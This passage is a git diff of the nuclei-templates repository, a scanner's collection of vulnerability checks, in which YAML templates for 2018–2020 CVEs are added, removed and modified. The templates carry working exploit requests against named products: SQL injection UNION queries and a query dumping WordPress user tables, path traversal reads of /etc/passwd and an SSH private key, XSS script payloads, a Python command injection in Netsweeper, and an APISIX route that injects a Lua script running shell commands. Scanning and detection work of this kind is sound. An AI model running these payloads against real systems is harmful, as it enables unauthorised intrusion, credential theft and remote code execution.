Scada" - - type: word - part: body - words: - - "** Platform sources **" - - "** Application sources **" - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-16670.yaml b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16670.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16670.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16671.yaml b/nuclei-templates/CVE-2018/CVE-2018-16671.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16671.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16671.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/CVE-2018-16761.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16761.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16761.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16836.yaml b/nuclei-templates/CVE-2018/CVE-2018-16836.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16836.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16836.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-17254.yaml b/nuclei-templates/CVE-2018/CVE-2018-17254.yaml deleted file mode 100644 index 348c3260bf..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-17254.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-17254 - -info: - name: Joomla! JCK Editor SQL Injection - author: Suman_Kar - severity: critical - description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. - reference: - - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - - https://www.exploit-db.com/exploits/45423/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-17254 - cwe-id: CWE-89 - remediation: Update or remove the affected plugin. - tags: joomla,sqli,cve,cve2018 - -requests: - - raw: - - | - GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - - matchers: - - type: word - part: body - words: - - "nuclei-template" - -# Enhanced by mp on 2022/02/08 diff --git a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml deleted file mode 100644 index e9c70f056b..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-17422 - -info: - name: dotCMS < 5.0.2 - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. - reference: - - https://github.com/dotCMS/core/issues/15286 - - https://www.cvedetails.com/cve/CVE-2018-17422 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-17422 - cwe-id: CWE-601 - metadata: - shodan-query: http.title:"dotCMS" - verified: "true" - tags: cve,cve2018,redirect,dotcms - -requests: - - method: GET - path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "self.location = 'http://www.example.com'" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-18069.yaml b/nuclei-templates/CVE-2018/CVE-2018-18069.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18069.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18069.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml deleted file mode 100644 index 7d14a28bf0..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-18264 - -info: - name: Kubernetes Dashboard unauthenticated secret access - author: edoardottt - severity: high - description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 - - https://github.com/kubernetes/dashboard/pull/3289 - - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-18264 - cwe-id: CWE-306 - metadata: - shodan-query: product:"Kubernetes" - tags: cve,cve2018,kubernetes,k8s,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: dsl - dsl: - - 'contains(body, "apiVersion") && contains(body, "objectRef")' \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-18323.yaml b/nuclei-templates/CVE-2018/CVE-2018-18323.yaml deleted file mode 100644 index 0161cdc19f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18323.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-18323 - -info: - name: Centos Web Panel 0.9.8.480 LFI - author: 0x_Akoko - severity: high - description: Centos Web Panel version 0.9.8.480 suffers from code execution, cross site scripting, and local file inclusion vulnerabilities. - reference: - - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html - - http://centos-webpanel.com/ - - https://www.cvedetails.com/cve/CVE-2018-18323 - - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-18323 - cwe-id: CWE-22 - tags: cve,cve2018,centos,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml b/nuclei-templates/CVE-2018/CVE-2018-18775.yaml deleted file mode 100644 index c20b618642..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-18775 - -info: - name: Cross Site Scripting in Microstrategy Web version 7 - author: 0x_Akoko - severity: medium - description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter - reference: - - https://www.exploit-db.com/exploits/45755 - - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html - - https://www.exploit-db.com/exploits/45755/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18775 - cwe-id: CWE-79 - tags: cve,cve2018,microstrategy,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '">' - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml b/nuclei-templates/CVE-2018/CVE-2018-18777.yaml index cf30bb7307..6c485e337c 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18777.yaml @@ -8,16 +8,13 @@ info: Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. - reference: - - https://www.exploit-db.com/exploits/45755 - - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html - - https://www.exploit-db.com/exploits/45755/ + reference: https://www.exploit-db.com/exploits/45755 + tags: cve,cve2018,microstrategy,lfi,traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 + cvss-score: 4.30 cve-id: CVE-2018-18777 cwe-id: CWE-22 - tags: cve,cve2018,microstrategy,lfi,traversal requests: - method: GET @@ -29,7 +26,7 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: diff --git a/nuclei-templates/CVE-2018/CVE-2018-19136.yaml b/nuclei-templates/CVE-2018/CVE-2018-19136.yaml new file mode 100644 index 0000000000..2fa0974afa --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19136.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-19136 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/registrar-account.php. + reference: + - https://www.exploit-db.com/exploits/45883/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19136 + - https://github.com/domainmod/domainmod/issues/79 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19136 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">&really_del=1">YES' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml new file mode 100644 index 0000000000..c689c4e74a --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-19137 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php. + reference: + - https://github.com/domainmod/domainmod/issues/79 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19137 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '&really_del' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19326.yaml b/nuclei-templates/CVE-2018/CVE-2018-19326.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19326.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19326.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-19365.yaml b/nuclei-templates/CVE-2018/CVE-2018-19365.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19365.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19365.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19439.yaml b/nuclei-templates/CVE-2018/CVE-2018-19439.yaml new file mode 100644 index 0000000000..d95e49bf11 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19439.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-19439 + +info: + name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console + author: madrobot,dwisiswant0 + severity: medium + description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4) + reference: + - http://www.securityfocus.com/bid/106006 + - http://seclists.org/fulldisclosure/2018/Nov/58 + - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19439 + cwe-id: CWE-79 + tags: cve,cve2018,oracle,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow> - ]> - - John - &ent; - - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/CVE-2020/cve-2020-12054.yaml b/nuclei-templates/CVE-2020/CVE-2020-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12054.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12054.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-12116.yaml b/nuclei-templates/CVE-2020/CVE-2020-12116.yaml deleted file mode 100644 index 2aef7ea0b4..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12116.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2020-12116 - -info: - name: Zoho ManageEngine OpManger - Arbitrary File Read - author: dwisiswant0 - severity: high - description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. - reference: - - https://github.com/BeetleChunks/CVE-2020-12116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 - - https://www.manageengine.com/network-monitoring/help/read-me-complete.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-12116 - cwe-id: CWE-22 - tags: cve,cve2020,zoho,lfi,manageengine - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Connection: close - - - | - GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Cache-Control: max-age=0 - Connection: close - Referer: http://{{Hostname}} - - extractors: - - type: regex - name: endpoint - part: body - internal: true - regex: - - "(?m)/cachestart/.*/jquery/" - - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' - - 'status_code_2 == 200' - condition: and - -# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-12259.yaml b/nuclei-templates/CVE-2020/CVE-2020-12259.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12259.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12259.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-12271.yaml b/nuclei-templates/CVE-2020/CVE-2020-12271.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12271.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12271.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml deleted file mode 100644 index bf3bf2f717..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-12447 - -info: - name: Onkyo TX-NR585 Web Interface - Directory Traversal - author: 0x_Akoko - severity: high - description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. - reference: - - https://blog.spookysec.net/onkyo-lfi - - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 - - https://blog.spookysec.net/onkyo-lfi/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-12447 - cwe-id: CWE-22 - tags: cve,cve2020,onkyo,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/04 diff --git a/nuclei-templates/CVE-2020/CVE-2020-12800.yaml b/nuclei-templates/CVE-2020/CVE-2020-12800.yaml index 78797b30fb..73818f066f 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-12800.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-12800.yaml @@ -1,22 +1,17 @@ id: CVE-2020-12800 info: - name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution + name: WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE author: dwisiswant0 severity: critical - description: | - WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-12800 - - https://github.com/amartinsec/CVE-2020-12800 - - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html - - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers + description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. + reference: https://github.com/amartinsec/CVE-2020-12800 + tags: cve,cve2020,wordpress,wp-plugin,upload classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-12800 cwe-id: CWE-434 - tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce requests: - raw: @@ -53,15 +48,18 @@ requests: GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word - part: body_2 + part: body words: - "CVE-2020-12800-{{randstr}}" - - type: status - status: - - 200 -# Enhanced by mp on 2022/05/16 + - type: word + part: header + words: + - "text/plain" diff --git a/nuclei-templates/CVE-2020/CVE-2020-13167.yaml b/nuclei-templates/CVE-2020/CVE-2020-13167.yaml new file mode 100644 index 0000000000..feb7792cd2 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-13167.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-13167 + +info: + name: Netsweeper <=6.4.3 - Python Code Injection + author: dwisiswant0 + severity: critical + description: | + Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. + reference: + - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ + - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says + - https://nvd.nist.gov/vuln/detail/CVE-2020-13167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13167 + cwe-id: CWE-78 + metadata: + hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out + tags: cve,cve2020,netsweeper,rce,python,webadmin + +requests: + - method: GET + path: + - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" + - "{{BaseURL}}/webadmin/out" + + headers: + Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "nonexistent" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml b/nuclei-templates/CVE-2020/CVE-2020-13405.yaml deleted file mode 100644 index 9aae1f9bf7..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-13405 -info: - name: MicroWeber - Unauthenticated User Database Disclosure - author: ritikchaddha,amit-jd - severity: high - description: | - The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. - reference: - - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 - - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-13405 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"microweber" - verified: "true" - tags: cve,cve2020,microweber,unauth,disclosure -requests: - - raw: - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:modules/load_module:users - - module={{endpoint}} - payloads: - endpoint: - - "users/controller" - - "modules/users/controller" - - "/modules/users/controller" - matchers: - - type: dsl - dsl: - - 'contains(body,"username")' - - 'contains(body,"password")' - - 'contains(body,"password_reset_hash")' - - 'status_code==200' - - 'contains(all_headers,"text/html")' - condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-13700.yaml b/nuclei-templates/CVE-2020/CVE-2020-13700.yaml index 9a0fa8e68e..42d1d0f6e1 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13700.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13700.yaml @@ -4,20 +4,17 @@ info: name: acf-to-rest-api wordpress plugin IDOR author: pikpikcu severity: high + reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 description: | An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. - reference: - - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 - - https://wordpress.org/plugins/acf-to-rest-api/#developers - - https://github.com/airesvsg/acf-to-rest-api + tags: cve,cve2020,wordpress,plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2020-13700 cwe-id: CWE-639 - tags: cve,cve2020,wordpress,plugin requests: - method: GET diff --git a/nuclei-templates/CVE-2020/CVE-2020-13937.yaml b/nuclei-templates/CVE-2020/CVE-2020-13937.yaml deleted file mode 100644 index 53149fd717..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13937.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-13937 - -info: - name: Apache Kylin Exposed Configuration File - author: pikpikcu - severity: medium - description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. - reference: - - https://kylin.apache.org/docs/release_notes.html - - https://s.tencent.com/research/bsafe/1156.html - - https://lists.apache.org/thread.html/rc592e0dcee5a2615f1d9522af30ef1822c1f863d5e05e7da9d1e57f4%40%3Cuser.kylin.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-13937 - cwe-id: CWE-922 - tags: cve,cve2020,apache - -requests: - - method: GET - path: - - "{{BaseURL}}/kylin/api/admin/config" - headers: - Content-Type: application/json - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - config - - kylin.metadata.url - condition: and - part: body - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13945.yaml b/nuclei-templates/CVE-2020/CVE-2020-13945.yaml deleted file mode 100644 index 3247e37750..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13945.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-13945 - -info: - name: Apache APISIX's Admin API Default Access Token (RCE) - author: pdteam - severity: medium - description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 - - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E - - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2020-13945 - tags: cve,cve2020,apache,apisix,rce,intrusive - -requests: - - raw: - - | - POST /apisix/admin/routes HTTP/1.1 - Host: {{Hostname}} - X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 - Content-Type: application/json - - { - "uri":"/{{randstr}}", - "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", - "upstream":{ - "type":"roundrobin", - "nodes":{ - "example.com:80":1 - } - } - } - - - | - GET /{{randstr}}?cmd=id HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - words: - - '"action":"create"' - - '"script":' - - '"node":' - condition: and - - - type: status - status: - - 201 - - extractors: - - type: regex - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" diff --git a/nuclei-templates/CVE-2020/CVE-2020-14092.yaml b/nuclei-templates/CVE-2020/CVE-2020-14092.yaml deleted file mode 100644 index 12a18bb822..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-14092.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-14092 - -info: - name: WordPress PayPal Pro <1.1.65 - SQL Injection - author: princechaddha - severity: critical - description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format. - reference: - - https://wpscan.com/vulnerability/10287 - - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro - - https://nvd.nist.gov/vuln/detail/CVE-2020-14092 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-14092 - cwe-id: CWE-89 - tags: cve,cve2020,wordpress,wp-plugin,sqli,paypal - -requests: - - method: GET - path: - - "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users" - - matchers-condition: and - matchers: - - type: word - words: - - "text/html" - part: header - - type: word - words: - - '"user_login"' - - '"user_email"' - - '"user_pass"' - - '"user_activation_key"' - condition: and - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14413.yaml b/nuclei-templates/CVE-2020/CVE-2020-14413.yaml deleted file mode 100644 index c1fef5a335..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-14413.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-14413 - -info: - name: NeDi 1.9C XSS - author: pikpikcu - severity: medium - description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily - bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. - reference: - - 